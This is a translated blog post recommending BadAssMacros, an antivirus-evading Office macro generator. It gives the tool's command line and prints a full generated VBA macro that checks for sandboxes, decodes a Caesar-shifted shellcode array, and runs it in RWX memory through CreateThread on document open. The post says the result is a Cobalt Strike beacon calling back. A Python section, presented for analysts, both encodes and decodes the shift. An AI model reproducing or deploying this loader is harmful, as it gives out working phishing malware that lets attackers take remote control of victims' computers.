Among the many attack techniques, phishing documents still hold an important place, and as security products have matured, macro evasion (AV bypass) has been a recurring topic. MacroPack (the paid version still works well) could generate evasive macro documents, but its output has since been signatured; the tool introduced today still works well.
Repository: https://github.com/Inf0secRabbit/BadAssMacros
First, the evasion result (screenshot in the original post, not reproduced here):
It currently offers the following features:
- Classic VBA shellcode injection.
- Indirect VBA shellcode injection (using LoadLibrary).
- Sandbox detection.
- VBA purging.
- Shellcode obfuscation.
- Variable name randomization.
Here I use the first method, classic injection. The raw shellcode file goes in with -i, -w picks the output type (doc or excel), -p no presumably leaves VBA purging off, -s classic selects the injection method, and -c is the Caesar shift applied to the shellcode bytes:
BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s classic -c <caesar_shift_value> -o <path_to_output_file>
The generated macro code looks like this:
' Win32 imports for the classic inject: allocate RWX memory, copy the decoded bytes in, run them on a new thread
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function stb()
Dim qAW As Variant
Dim GvH As LongPtr
Dim DTc As Long
Dim xiB As Long
Dim fWB As LongPtr
' Sandbox check 1: a real user's Office install has a history of recently opened files
If Application.RecentFiles.Count < 3 Then
Exit Function
End If
' Sandbox check 2: analysis VMs are commonly given only one or two CPU cores
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
Exit Function
End If
Next
' Shellcode, Caesar-shifted by 3 (the -c value): each entry is the raw byte + 3, so entries can exceed 255
qAW = Array(255, 75, 134, 231, 243, 235, 203, 3, 3, 3, 68, 84, 68, 83, 85, 84, 89, 75, 52, 213, 104, 75, 142, 85, 99, 75, 142, 85, 27, 75, 142, 85, 35, 75, 142, 117, 83, 75, 18, 186, 77, 77, 80, 52, 204, 75, 52, 195, 175, 63, _
100, 127, 5, 47, 35, 68, 196, 204, 16, 68, 4, 196, 229, 240, 85, 68, 84, 75, 142, 85, 35, 142, 69, 63, 75, 4, 211, 105, 132, 123, 27, 14, 5, 120, 117, 142, 131, 139, 3, 3, 3, 75, 136, 195, 119, 106, 75, 4, 211, 83, _
142, 75, 27, 71, 142, 67, 35, 76, 4, 211, 230, 89, 75, 258, 204, 68, 142, 55, 139, 75, 4, 217, 80, 52, 204, 75, 52, 195, 175, 68, 196, 204, 16, 68, 4, 196, 59, 227, 120, 244, 79, 6, 79, 39, 11, 72, 60, 212, 120, 219, _
91, 71, 142, 67, 39, 76, 4, 211, 105, 68, 142, 15, 75, 71, 142, 67, 31, 76, 4, 211, 68, 142, 7, 139, 75, 4, 211, 68, 91, 68, 91, 97, 92, 93, 68, 91, 68, 92, 68, 93, 75, 134, 239, 35, 68, 85, 258, 227, 91, 68, _
92, 93, 75, 142, 21, 236, 82, 258, 258, 258, 96, 109, 3, 76, 193, 122, 108, 113, 108, 113, 104, 119, 3, 68, 89, 76, 140, 233, 79, 140, 244, 68, 189, 79, 122, 41, 10, 258, 216, 75, 52, 204, 75, 52, 213, 80, 52, 195, 80, 52, _
204, 68, 83, 68, 83, 68, 189, 61, 89, 124, 170, 258, 216, 238, 118, 93, 75, 140, 196, 68, 187, 100, 33, 3, 3, 80, 52, 204, 68, 84, 68, 84, 109, 6, 68, 84, 68, 189, 90, 140, 162, 201, 258, 216, 238, 92, 94, 75, 140, 196, _
75, 52, 213, 76, 140, 219, 80, 52, 204, 85, 107, 3, 5, 67, 135, 85, 85, 68, 189, 238, 88, 49, 62, 258, 216, 75, 140, 201, 75, 134, 198, 83, 109, 13, 98, 75, 140, 244, 75, 140, 221, 76, 202, 195, 258, 258, 258, 258, 80, 52, _
204, 85, 85, 68, 189, 48, 9, 27, 126, 258, 216, 136, 195, 18, 136, 160, 4, 3, 3, 75, 258, 210, 18, 135, 143, 4, 3, 3, 238, 214, 236, 231, 4, 3, 3, 235, 165, 258, 258, 258, 50, 68, 107, 105, 81, 3, 157, 152, 102, 60, _
179, 136, 116, 184, 55, 38, 239, 250, 111, 149, 90, 39, 166, 220, 17, 236, 156, 173, 190, 208, 118, 42, 257, 206, 123, 209, 43, 169, 53, 205, 216, 128, 12, 197, 242, 182, 95, 141, 121, 124, 19, 107, 29, 95, 202, 59, 153, 178, 48, 5, _
145, 187, 177, 77, 21, 147, 43, 170, 168, 82, 205, 158, 16, 63, 236, 93, 13, 138, 84, 3, 88, 118, 104, 117, 48, 68, 106, 104, 113, 119, 61, 35, 80, 114, 125, 108, 111, 111, 100, 50, 55, 49, 51, 35, 43, 102, 114, 112, 115, 100, _
119, 108, 101, 111, 104, 62, 35, 80, 86, 76, 72, 35, 59, 49, 51, 62, 35, 90, 108, 113, 103, 114, 122, 118, 35, 81, 87, 35, 56, 49, 52, 62, 35, 87, 117, 108, 103, 104, 113, 119, 50, 55, 49, 51, 44, 16, 13, 3, 214, 193, _
208, 55, 4, 11, 192, 107, 203, 115, 147, 235, 180, 13, 143, 54, 239, 195, 106, 45, 70, 111, 186, 9, 50, 123, 33, 127, 155, 240, 94, 109, 44, 74, 215, 28, 87, 65, 234, 248, 256, 243, 98, 44, 211, 214, 183, 133, 125, 236, 179, 173, _
42, 79, 178, 37, 192, 157, 121, 113, 171, 34, 186, 133, 255, 128, 215, 171, 210, 205, 146, 240, 29, 36, 48, 127, 76, 230, 26, 217, 115, 92, 25, 236, 197, 231, 257, 122, 62, 143, 244, 121, 27, 239, 38, 94, 56, 147, 243, 126, 156, 179, _
56, 182, 70, 237, 65, 27, 97, 239, 200, 197, 202, 174, 144, 34, 151, 62, 49, 60, 202, 52, 98, 40, 250, 185, 239, 199, 73, 221, 9, 190, 126, 256, 79, 55, 29, 250, 163, 143, 71, 209, 165, 146, 197, 110, 170, 166, 230, 200, 159, 3, _
116, 93, 9, 95, 83, 16, 158, 164, 178, 82, 59, 108, 40, 34, 85, 47, 32, 224, 108, 77, 211, 83, 65, 201, 229, 35, 220, 3, 214, 148, 211, 48, 250, 225, 80, 148, 6, 168, 36, 35, 66, 197, 200, 170, 212, 245, 149, 56, 30, 181, _
21, 188, 102, 214, 68, 45, 199, 87, 53, 11, 121, 103, 133, 62, 193, 58, 25, 75, 138, 207, 190, 118, 212, 3, 68, 193, 243, 184, 165, 89, 258, 216, 75, 52, 204, 189, 3, 3, 67, 3, 68, 187, 3, 19, 3, 3, 68, 188, 67, 3, _
3, 3, 68, 189, 91, 167, 86, 232, 258, 216, 75, 150, 86, 86, 75, 140, 234, 75, 140, 244, 75, 140, 221, 68, 187, 3, 35, 3, 3, 76, 140, 252, 68, 189, 21, 153, 140, 229, 258, 216, 75, 134, 199, 35, 136, 195, 119, 185, 105, 142, _
10, 75, 4, 198, 136, 195, 120, 218, 91, 91, 91, 75, 8, 3, 3, 3, 3, 83, 198, 235, 162, 256, 258, 258, 52, 60, 53, 49, 52, 57, 59, 49, 52, 53, 54, 49, 52, 54, 52, 3, 84, 12, 194, 112)
' Undo the Caesar shift to recover the raw shellcode bytes
For i = 0 To UBound(qAW)
qAW(i) = qAW(i) - 3
Next i
' RWX allocation: &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE; size covers LBound..UBound inclusive
GvH = VirtualAlloc(0, UBound(qAW) + 1, &H3000, &H40)
' Copy the bytes in one at a time; the Long is passed ByRef, so RtlMoveMemory reads its low byte
For DTc = LBound(qAW) To UBound(qAW)
xiB = qAW(DTc)
fWB = RtlMoveMemory(GvH + DTc, xiB, 1)
Next DTc
' Execute the shellcode on a new thread inside the Office process
res = CreateThread(0, 0, GvH, 0, 0, 0)
End Function
' Two auto-run entry points (the Document_Open event and the legacy AutoOpen auto-macro) both call the same routine
Sub Document_Open()
stb
End Sub
Sub AutoOpen()
stb
End Sub
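The Caesar-shift stage is simple enough to reproduce and, more usefully for a defender, to reverse. The Python below is an added example written for this write-up, not BadAssMacros' own code; it assumes only what the macro above shows (each array value is the raw byte plus the -c shift, emitted 50 per line with VBA " _" continuations, and undone at run time by subtracting the shift). The function names and the SAMPLE_ARRAY constant, which copies the first three lines of the macro's array, are mine.

```python
"""Reproduce and reverse the Caesar-shifted shellcode array used by the macro above.

Added example for this write-up, not BadAssMacros' own code.  Assumed from the
macro: encoded value = raw byte + shift, 50 values per line joined with VBA
" _" continuations, decoded at run time by subtracting the shift.
"""
from __future__ import annotations

import re

# Constructed sample: the first three Array() lines of the macro above, closed
# early with ")" so it parses on its own.
SAMPLE_ARRAY = (
    "qAW = Array(255, 75, 134, 231, 243, 235, 203, 3, 3, 3, 68, 84, 68, 83, 85, 84, 89, 75, 52, 213, 104, 75, 142, 85, 99, 75, 142, 85, 27, 75, 142, 85, 35, 75, 142, 117, 83, 75, 18, 186, 77, 77, 80, 52, 204, 75, 52, 195, 175, 63, _\n"
    "100, 127, 5, 47, 35, 68, 196, 204, 16, 68, 4, 196, 229, 240, 85, 68, 84, 75, 142, 85, 35, 142, 69, 63, 75, 4, 211, 105, 132, 123, 27, 14, 5, 120, 117, 142, 131, 139, 3, 3, 3, 75, 136, 195, 119, 106, 75, 4, 211, 83, _\n"
    "142, 75, 27, 71, 142, 67, 35, 76, 4, 211, 230, 89, 75, 258, 204, 68, 142, 55, 139, 75, 4, 217, 80, 52, 204, 75, 52, 195, 175, 68, 196, 204, 16, 68, 4, 196, 59, 227, 120, 244, 79, 6, 79, 39, 11, 72, 60, 212, 120, 219)"
)

_ARRAY_RE = re.compile(r"Array\(([^)]*)\)")


def _values(vba_text: str) -> list[int]:
    """Pull the integer list out of a VBA Array(...) literal, tolerating ' _' continuations."""
    m = _ARRAY_RE.search(vba_text)
    if m is None:
        raise ValueError("no Array(...) literal found")
    body = m.group(1).replace("_", "")  # drop the line-continuation markers
    return [int(tok) for tok in body.split(",") if tok.strip()]


def encode_shellcode(raw: bytes, shift: int, per_line: int = 50) -> str:
    """Generator side: shift every raw byte up and lay the result out as the macro expects.
    Values above 255 are fine (the macro's array contains 258): VBA keeps them as Integer
    Variants and the run-time loop subtracts the shift before each is copied as one byte."""
    if not 0 <= shift <= 255:
        raise ValueError("shift must be in 0..255")
    values = [b + shift for b in raw]
    lines = [", ".join(str(v) for v in values[i:i + per_line])
             for i in range(0, len(values), per_line)]
    return "Array(" + ", _\n".join(lines) + ")"


def decode_vba_array(vba_text: str, shift: int) -> bytes:
    """Analyst side: undo the shift on an array lifted from a macro (e.g. olevba output).
    A value outside shift..shift+255 cannot have come from a byte, so the shift guess is wrong."""
    out = bytearray()
    for v in _values(vba_text):
        if not shift <= v <= shift + 255:
            raise ValueError(f"value {v} is impossible for shift {shift}")
        out.append(v - shift)
    return bytes(out)


def infer_shift(vba_text: str) -> tuple[int, int]:
    """Bound the shift from the values alone, without reading the decode loop: raw bytes are
    0..255, so shift >= max(values) - 255 and shift <= min(values).  Equal bounds pin it."""
    vals = _values(vba_text)
    return max(max(vals) - 255, 0), min(vals)


if __name__ == "__main__":
    lo, hi = infer_shift(SAMPLE_ARRAY)
    print(f"shift is between {lo} and {hi}")
    sc = decode_vba_array(SAMPLE_ARRAY, lo)
    # The first bytes come out as FC 48 83 E4 F0 E8 C8 00 00 00: the cld / and rsp,-16 / call
    # prologue shared by x64 Metasploit and Cobalt Strike stagers, a quick tell for the analyst.
    print(sc[:10].hex(" "))
    print(encode_shellcode(sc[:10], 3))
```

On the sample the bounds meet at 3, which is exactly the -c value from the command line, and the decoded prologue identifies the payload family before anything is executed. The same two-line check (largest value minus 255, smallest value) works on any macro produced with this scheme, so a shift picked at random buys nothing against an analyst who has the array.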
After running it, the Cobalt Strike beacon checks in; anyone interested can dig through the source themselves.
This article was first published on the WeChat public account 鸿鹄实验室: Tool recommendation: BadAssMacros evasion macro generator
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site accepts none. Questions can be sent by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).